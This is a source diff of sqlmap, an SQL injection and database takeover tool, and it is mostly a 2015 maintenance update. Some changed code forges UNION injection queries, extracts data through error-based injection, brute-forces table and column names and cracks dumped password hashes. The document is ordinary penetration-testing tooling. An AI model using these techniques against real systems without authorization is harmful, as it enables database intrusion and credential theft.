 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py
index 66e565bf1..4a1594590 100644
--- a/lib/techniques/brute/use.py
+++ b/lib/techniques/brute/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -116,7 +116,7 @@ def tableExists(tableFile, regex=None):
 
                 if conf.verbose in (1, 2) and not hasattr(conf, "api"):
                     clearConsoleLine(True)
-                    infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
+                    infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
                     dataToStdout(infoMsg, True)
 
             if conf.verbose in (1, 2):
@@ -224,11 +224,11 @@ def columnExists(columnFile, regex=None):
 
                 if conf.verbose in (1, 2) and not hasattr(conf, "api"):
                     clearConsoleLine(True)
-                    infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
+                    infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
                     dataToStdout(infoMsg, True)
 
             if conf.verbose in (1, 2):
-                status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
+                status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
                 dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
 
             kb.locks.io.release()
@@ -257,9 +257,9 @@ def columnExists(columnFile, regex=None):
                 result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
 
             if result:
-                columns[column] = 'numeric'
+                columns[column] = "numeric"
             else:
-                columns[column] = 'non-numeric'
+                columns[column] = "non-numeric"
 
         kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
 
diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/dns/__init__.py
+++ b/lib/techniques/dns/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py
index 96c78f700..1d8b8c569 100644
--- a/lib/techniques/dns/test.py
+++ b/lib/techniques/dns/test.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index ef7280be9..8b09335bd 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -98,7 +98,7 @@ def dnsUse(payload, expression):
             retVal = output
 
             if kb.dnsTest is not None:
-                dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
+                dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
 
                 if count > 0:
                     hashDBWrite(expression, output)
diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/error/__init__.py
+++ b/lib/techniques/error/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index f6c960484..813a764c2 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -74,7 +74,7 @@ def _oneShotErrorUse(expression, field=None):
         try:
             while True:
                 check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
-                trimcheck = "%s(?P<result>.*?)</" % (kb.chars.start)
+                trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start)
 
                 if field:
                     nulledCastedField = agent.nullAndCastField(field)
@@ -130,6 +130,16 @@ def _oneShotErrorUse(expression, field=None):
                         warnMsg += safecharencode(trimmed)
                         logger.warn(warnMsg)
 
+                        if not kb.testMode:
+                            check = "(?P<result>.*?)%s" % kb.chars.stop[:2]
+                            output = extractRegexResult(check, trimmed, re.IGNORECASE)
+
+                            if not output:
+                                check = "(?P<result>[^\s<>'\"]+)"
+                                output = extractRegexResult(check, trimmed, re.IGNORECASE)
+                            else:
+                                output = output.rstrip()
+
                 if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
                     if offset == 1:
                         retVal = output
@@ -271,7 +281,7 @@ def errorUse(expression, dump=False):
             # Count the number of SQL query entries output
             countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)
 
-            if " ORDER BY " in expression.upper():
+            if " ORDER BY " in countedExpression.upper():
                 _ = countedExpression.upper().rindex(" ORDER BY ")
                 countedExpression = countedExpression[:_]
 
diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/union/__init__.py
+++ b/lib/techniques/union/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 50c92e441..a498bf08c 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -81,73 +81,74 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
 
             return found
 
-    pushValue(kb.errorIsNone)
-    items, ratios = [], []
-    kb.errorIsNone = False
-    lowerCount, upperCount = conf.uColsStart, conf.uColsStop
+    try:
+        pushValue(kb.errorIsNone)
+        items, ratios = [], []
+        kb.errorIsNone = False
+        lowerCount, upperCount = conf.uColsStart, conf.uColsStop
 
-    if lowerCount == 1:
-        found = kb.orderByColumns or _orderByTechnique()
-        if found:
-            kb.orderByColumns = found
-            infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
-            singleTimeLogMessage(infoMsg)
-            return found
+        if lowerCount == 1:
+            found = kb.orderByColumns or _orderByTechnique()
+            if found:
+                kb.orderByColumns = found
+                infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
+                singleTimeLogMessage(infoMsg)
+                return found
 
-    if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
-        upperCount = lowerCount + MIN_UNION_RESPONSES
+        if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
+            upperCount = lowerCount + MIN_UNION_RESPONSES
 
-    min_, max_ = MAX_RATIO, MIN_RATIO
-    pages = {}
+        min_, max_ = MAX_RATIO, MIN_RATIO
+        pages = {}
+
+        for count in xrange(lowerCount, upperCount + 1):
+            query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
+            payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
+            page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
+            if not isNullValue(kb.uChar):
+                pages[count] = page
+            ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
+            ratios.append(ratio)
+            min_, max_ = min(min_, ratio), max(max_, ratio)
+            items.append((count, ratio))
 
-    for count in xrange(lowerCount, upperCount + 1):
-        query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
-        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
-        page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
         if not isNullValue(kb.uChar):
-            pages[count] = page
-        ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
-        ratios.append(ratio)
-        min_, max_ = min(min_, ratio), max(max_, ratio)
-        items.append((count, ratio))
+            for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
+                contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()]
+                if len(filter(lambda x: x[1], contains)) == 1:
+                    retVal = filter(lambda x: x[1], contains)[0][0]
+                    break
 
-    if not isNullValue(kb.uChar):
-        for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
-            contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()]
-            if len(filter(lambda x: x[1], contains)) == 1:
-                retVal = filter(lambda x: x[1], contains)[0][0]
-                break
+        if not retVal:
+            ratios.pop(ratios.index(min_))
+            ratios.pop(ratios.index(max_))
 
-    if not retVal:
-        ratios.pop(ratios.index(min_))
-        ratios.pop(ratios.index(max_))
+            minItem, maxItem = None, None
 
-        minItem, maxItem = None, None
+            for item in items:
+                if item[1] == min_:
+                    minItem = item
+                elif item[1] == max_:
+                    maxItem = item
 
-        for item in items:
-            if item[1] == min_:
-                minItem = item
-            elif item[1] == max_:
-                maxItem = item
+            if all(map(lambda x: x == min_ and x != max_, ratios)):
+                retVal = maxItem[0]
 
-        if all(map(lambda x: x == min_ and x != max_, ratios)):
-            retVal = maxItem[0]
+            elif all(map(lambda x: x != min_ and x == max_, ratios)):
+                retVal = minItem[0]
 
-        elif all(map(lambda x: x != min_ and x == max_, ratios)):
-            retVal = minItem[0]
+            elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
+                    deviation = stdev(ratios)
+                    lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
 
-        elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
-                deviation = stdev(ratios)
-                lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
+                    if min_ < lower:
+                        retVal = minItem[0]
 
-                if min_ < lower:
-                    retVal = minItem[0]
-
-                if max_ > upper:
-                    if retVal is None or abs(max_ - upper) > abs(min_ - lower):
-                        retVal = maxItem[0]
-
-    kb.errorIsNone = popValue()
+                    if max_ > upper:
+                        if retVal is None or abs(max_ - upper) > abs(min_ - lower):
+                            retVal = maxItem[0]
+    finally:
+        kb.errorIsNone = popValue()
 
     if retVal:
         infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py
index 75e4c4b68..034223c52 100644
--- a/lib/techniques/union/use.py
+++ b/lib/techniques/union/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -322,7 +322,7 @@ def unionUse(expression, unpack=True, dump=False):
                                 if len(status) > width:
                                     status = "%s..." % status[:width - 3]
 
-                                dataToStdout("%s\r\n" % status, True)
+                                dataToStdout("%s\n" % status, True)
 
                 runThreads(numThreads, unionThread)
 
diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/utils/__init__.py
+++ b/lib/utils/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/api.py b/lib/utils/api.py
index 7a22bb123..c007289b5 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -2,13 +2,12 @@
 # -*- coding: utf-8 -*-
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import logging
 import os
-import shutil
 import sqlite3
 import sys
 import tempfile
@@ -29,8 +28,10 @@ from lib.core.datatype import AttribDict
 from lib.core.defaults import _defaults
 from lib.core.enums import CONTENT_STATUS
 from lib.core.enums import PART_RUN_CONTENT_TYPES
+from lib.core.exception import SqlmapConnectionException
 from lib.core.log import LOGGER_HANDLER
 from lib.core.optiondict import optDict
+from lib.core.settings import IS_WIN
 from lib.core.subprocessng import Popen
 from thirdparty.bottle.bottle import error as return_error
 from thirdparty.bottle.bottle import get
@@ -66,17 +67,27 @@ class Database(object):
         logger.debug("REST-JSON API %s connected to IPC database" % who)
 
     def disconnect(self):
-        self.cursor.close()
-        self.connection.close()
+        if self.cursor:
+            self.cursor.close()
+
+        if self.connection:
+            self.connection.close()
 
     def commit(self):
         self.connection.commit()
 
     def execute(self, statement, arguments=None):
-        if arguments:
-            self.cursor.execute(statement, arguments)
-        else:
-            self.cursor.execute(statement)
+        while True:
+            try:
+                if arguments:
+                    self.cursor.execute(statement, arguments)
+                else:
+                    self.cursor.execute(statement)
+            except sqlite3.OperationalError, ex:
+                if not "locked" in ex.message:
+                    raise
+            else:
+                break
 
         if statement.lstrip().upper().startswith("SELECT"):
             return self.cursor.fetchall()
@@ -103,7 +114,6 @@ class Database(object):
 class Task(object):
     def __init__(self, taskid):
         self.process = None
-        self.temporary_directory = False
         self.output_directory = None
         self.options = None
         self._original_options = None
@@ -143,29 +153,9 @@ class Task(object):
     def reset_options(self):
         self.options = AttribDict(self._original_options)
 
-    def set_output_directory(self):
-        if self.get_option("outputDir"):
-            if os.path.isdir(self.get_option("outputDir")):
-                self.output_directory = self.get_option("outputDir")
-            else:
-                try:
-                    os.makedirs(self.get_option("outputDir"))
-                    self.output_directory = self.get_option("outputDir")
-                except OSError:
-                    pass
-
-        if not self.output_directory or not os.path.isdir(self.output_directory):
-            self.output_directory = tempfile.mkdtemp(prefix="sqlmapoutput-")
-            self.temporary_directory = True
-            self.set_option("outputDir", self.output_directory)
-
-    def clean_filesystem(self):
-        if self.output_directory and self.temporary_directory:
-            shutil.rmtree(self.output_directory)
-
     def engine_start(self):
-        self.process = Popen("python sqlmap.py --pickled-options %s" % base64pickle(self.options),
-                             shell=True, stdin=PIPE, close_fds=False)
+        self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
+                             shell=False, stdin=PIPE, close_fds=not IS_WIN)
 
     def engine_stop(self):
         if self.process:
@@ -273,8 +263,11 @@ class LogRecorder(logging.StreamHandler):
 
 def setRestAPILog():
     if hasattr(conf, "api"):
-        conf.database_cursor = Database(conf.database)
-        conf.database_cursor.connect("client")
+        try:
+            conf.database_cursor = Database(conf.database)
+            conf.database_cursor.connect("client")
+        except sqlite3.OperationalError, ex:
+            raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database)
 
         # Set a logging handler that writes log messages to a IPC database
         logger.removeHandler(LOGGER_HANDLER)
@@ -344,7 +337,7 @@ def task_new():
     taskid = hexencode(os.urandom(8))
     DataStore.tasks[taskid] = Task(taskid)
 
-    logger.debug(" [%s] Created new task" % taskid)
+    logger.debug("Created new task: '%s'" % taskid)
     return jsonize({"success": True, "taskid": taskid})
 
 
@@ -354,7 +347,6 @@ def task_delete(taskid):
     Delete own task ID
     """
     if taskid in DataStore.tasks:
-        DataStore.tasks[taskid].clean_filesystem()
         DataStore.tasks.pop(taskid)
 
         logger.debug("[%s] Deleted task" % taskid)
@@ -388,9 +380,6 @@ def task_flush(taskid):
     Flush task spool (delete all tasks)
     """
     if is_admin(taskid):
-        for task in DataStore.tasks:
-            DataStore.tasks[task].clean_filesystem()
-
         DataStore.tasks = dict()
         logger.debug("[%s] Flushed task pool" % taskid)
         return jsonize({"success": True})
@@ -466,9 +455,6 @@ def scan_start(taskid):
     for option, value in request.json.items():
         DataStore.tasks[taskid].set_option(option, value)
 
-    # Overwrite output directory value to a temporary directory
-    DataStore.tasks[taskid].set_output_directory()
-
     # Launch sqlmap engine in a separate process
     DataStore.tasks[taskid].engine_start()
 
@@ -663,9 +649,9 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT):
 
     # TODO: write a simple client with requests, for now use curl from command line
     logger.error("Not yet implemented, use curl from command line instead for now, for example:")
-    print "\n\t$ curl http://%s:%d/task/new" % (host, port)
+    print "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port)
     print ("\t$ curl -H \"Content-Type: application/json\" "
            "-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' "
-           "http://%s:%d/scan/:taskid/start") % (host, port)
-    print "\t$ curl http://%s:%d/scan/:taskid/data" % (host, port)
-    print "\t$ curl http://%s:%d/scan/:taskid/log\n" % (host, port)
+           "http://%s:%d/scan/$taskid/start") % (host, port)
+    print "\t$ curl http://%s:%d/scan/$taskid/data" % (host, port)
+    print "\t$ curl http://%s:%d/scan/$taskid/log\n" % (host, port)
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 07860ff87..be47608e1 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -1,19 +1,23 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import httplib
+import os
 import re
 import urlparse
+import tempfile
 import time
 
 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
 from lib.core.common import findPageForms
-from lib.core.common import singleTimeWarnMessage
+from lib.core.common import openFile
+from lib.core.common import readInput
+from lib.core.common import safeCSValue
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -21,6 +25,7 @@ from lib.core.exception import SqlmapConnectionException
 from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
 from lib.core.threads import getCurrentThreadData
 from lib.core.threads import runThreads
+from lib.parse.sitemap import parseSitemap
 from lib.request.connect import Connect as Request
 from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup
 from thirdparty.oset.pyoset import oset
@@ -40,6 +45,10 @@ def crawl(target):
                         current = threadData.shared.unprocessed.pop()
                         if current in visited:
                             continue
+                        elif conf.crawlExclude and re.search(conf.crawlExclude, current):
+                            dbgMsg = "skipping '%s'" % current
+                            logger.debug(dbgMsg)
+                            continue
                         else:
                             visited.add(current)
                     else:
@@ -109,15 +118,32 @@ def crawl(target):
         threadData.shared.deeper = set()
         threadData.shared.unprocessed = set([target])
 
+        if not conf.sitemapUrl:
+            message = "do you want to check for the existence of "
+            message += "site's sitemap(.xml) [y/N] "
+            test = readInput(message, default="n")
+            if test[0] in ("y", "Y"):
+                items = None
+                url = urlparse.urljoin(target, "/sitemap.xml")
+                try:
+                    items = parseSitemap(url)
+                except:
+                    pass
+                finally:
+                    if items:
+                        for item in items:
+                            if re.search(r"(.*?)\?(.+)", item):
+                                threadData.shared.value.add(item)
+                        if conf.crawlDepth > 1:
+                            threadData.shared.unprocessed.update(items)
+                    logger.info("%s links found" % ("no" if not items else len(items)))
+
         infoMsg = "starting crawler"
         if conf.bulkFile:
             infoMsg += " for target URL '%s'" % target
         logger.info(infoMsg)
 
         for i in xrange(conf.crawlDepth):
-            if i > 0 and conf.threads == 1:
-                singleTimeWarnMessage("running in a single-thread mode. This could take a while")
-
             threadData.shared.count = 0
             threadData.shared.length = len(threadData.shared.unprocessed)
             numThreads = min(conf.threads, len(threadData.shared.unprocessed))
@@ -125,7 +151,7 @@ def crawl(target):
             if not conf.bulkFile:
                 logger.info("searching for links with depth %d" % (i + 1))
 
-            runThreads(numThreads, crawlThread)
+            runThreads(numThreads, crawlThread, threadChoice=(i>0))
             clearConsoleLine(True)
 
             if threadData.shared.deeper:
@@ -146,4 +172,33 @@ def crawl(target):
             logger.warn(warnMsg)
         else:
             for url in threadData.shared.value:
-                kb.targets.add((url, None, None, None))
+                kb.targets.add((url, None, None, None, None))
+
+        storeResultsToFile(kb.targets)
+
+def storeResultsToFile(results):
+    if not results:
+        return
+
+    if kb.storeCrawlingChoice is None:
+        message = "do you want to store crawling results to a temporary file "
+        message += "for eventual further processing with other tools [y/N] "
+        test = readInput(message, default="N")
+        kb.storeCrawlingChoice = test[0] in ("y", "Y")
+
+    if kb.storeCrawlingChoice:
+        handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt")
+        os.close(handle)
+
+        infoMsg = "writing crawling results to a temporary file '%s' " % filename
+        logger.info(infoMsg)
+
+        with openFile(filename, "w+b") as f:
+            if conf.forms:
+                f.write("URL,POST\n")
+
+            for url, _, data, _, _ in results:
+                if conf.forms:
+                    f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or "")))
+                else:
+                    f.write("%s\n" % url)
diff --git a/lib/utils/deps.py b/lib/utils/deps.py
index b0184d911..efca6e1c3 100644
--- a/lib/utils/deps.py
+++ b/lib/utils/deps.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -46,7 +46,7 @@ def checkDependencies():
                 import jpype
         except ImportError:
             warnMsg = "sqlmap requires '%s' third-party library " % data[1]
-            warnMsg += "in order to directly connect to the database "
+            warnMsg += "in order to directly connect to the DBMS "
             warnMsg += "%s. Download from %s" % (dbmsName, data[2])
             logger.warn(warnMsg)
             missing_libraries.add(data[1])
@@ -72,12 +72,23 @@ def checkDependencies():
         debugMsg = "'python-ntlm' third-party library is found"
         logger.debug(debugMsg)
     except ImportError:
-        warnMsg = "sqlmap requires 'python-ntlm' third-party library for "
+        warnMsg = "sqlmap requires 'python-ntlm' third-party library "
         warnMsg += "if you plan to attack a web application behind NTLM "
         warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/"
         logger.warn(warnMsg)
         missing_libraries.add('python-ntlm')
 
+    try:
+        from websocket import ABNF
+        debugMsg = "'python websocket-client' library is found"
+        logger.debug(debugMsg)
+    except ImportError:
+        warnMsg = "sqlmap requires 'websocket-client' third-party library "
+        warnMsg += "if you plan to attack a web application using WebSocket. "
+        warnMsg += "Download from https://pypi.python.org/pypi/websocket-client/"
+        logger.warn(warnMsg)
+        missing_libraries.add('websocket-client')
+
     if IS_WIN:
         try:
             import pyreadline
diff --git a/lib/utils/getch.py b/lib/utils/getch.py
index 13f03fdb0..af9a56160 100644
--- a/lib/utils/getch.py
+++ b/lib/utils/getch.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/google.py b/lib/utils/google.py
index e675aa1af..b12de7ced 100644
--- a/lib/utils/google.py
+++ b/lib/utils/google.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -46,10 +46,8 @@ class Google(object):
         try:
             conn = self.opener.open("http://www.google.com/ncr")
             conn.info()  # retrieve session cookie
-        except urllib2.HTTPError, e:
-            e.info()
-        except urllib2.URLError:
-            errMsg = "unable to connect to Google"
+        except Exception, ex:
+            errMsg = "unable to connect to Google ('%s')" % ex
             raise SqlmapConnectionException(errMsg)
 
     def search(self, dork):
@@ -154,7 +152,7 @@ class Google(object):
                         warnMsg += "to get error page information (%d)" % e.code
                         logger.critical(warnMsg)
                         return None
-                except (urllib2.URLError, socket.error, socket.timeout):
+                except:
                     errMsg = "unable to connect to DuckDuckGo"
                     raise SqlmapConnectionException(errMsg)
 
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 0c76bff5b..69994d23e 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -19,7 +19,11 @@ try:
 except (ImportError, OSError):
     pass
 else:
-    _multiprocessing = multiprocessing
+    try:
+        if multiprocessing.cpu_count() > 1:
+            _multiprocessing = multiprocessing
+    except NotImplementedError:
+        pass
 
 import gc
 import os
@@ -40,6 +44,7 @@ from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
 from lib.core.common import getFileItems
 from lib.core.common import getPublicTypeMembers
+from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
 from lib.core.common import normalizeUnicode
@@ -55,7 +60,6 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import HASH
-from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import COMMON_PASSWORD_SUFFIXES
 from lib.core.settings import COMMON_USER_COLUMNS
@@ -64,11 +68,11 @@ from lib.core.settings import HASH_MOD_ITEM_DISPLAY
 from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD
 from lib.core.settings import IS_WIN
 from lib.core.settings import ITOA64
-from lib.core.settings import ML
 from lib.core.settings import NULL
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.settings import ROTATING_CHARS
 from lib.core.wordlist import Wordlist
+from thirdparty.colorama.initialise import init as coloramainit
 from thirdparty.pydes.pyDes import des
 from thirdparty.pydes.pyDes import CBC
 
@@ -324,7 +328,7 @@ def wordpress_passwd(password, salt, count, prefix, uppercase=False):
         return output
 
     cipher = md5(salt)
-    cipher.update(password)
+    cipher.update(password.encode(UNICODE_ENCODING))
     hash_ = cipher.digest()
 
     for i in xrange(count):
@@ -400,9 +404,10 @@ def attackCachedUsersPasswords():
 
         for user in kb.data.cachedUsersPasswords.keys():
             for i in xrange(len(kb.data.cachedUsersPasswords[user])):
-                value = kb.data.cachedUsersPasswords[user][i].lower().split()[0]
-                if value in lut:
-                    kb.data.cachedUsersPasswords[user][i] += "%s    clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value])
+                if (kb.data.cachedUsersPasswords[user][i] or "").strip():
+                    value = kb.data.cachedUsersPasswords[user][i].lower().split()[0]
+                    if value in lut:
+                        kb.data.cachedUsersPasswords[user][i] += "%s    clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value])
 
 def attackDumpedTable():
     if kb.data.dumpedTable:
@@ -508,6 +513,9 @@ def hashRecognition(value):
     return retVal
 
 def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist):
+    if IS_WIN:
+        coloramainit()
+
     count = 0
     rotator = 0
     hashes = set([item[0][1] for item in attack_info])
@@ -569,7 +577,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc
 
             except Exception, e:
                 warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e)
-                warnMsg += "Please report by e-mail to %s" % ML
+                warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
                 logger.critical(warnMsg)
 
     except KeyboardInterrupt:
@@ -581,6 +589,9 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc
                 proc_count.value -= 1
 
 def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist):
+    if IS_WIN:
+        coloramainit()
+
     count = 0
     rotator = 0
 
@@ -626,7 +637,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found
                         rotator = 0
                     status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator])
 
-                    if not user.startswith(DUMMY_USER_PREFIX):
+                    if user and not user.startswith(DUMMY_USER_PREFIX):
                         status += ' (user: %s)' % user
 
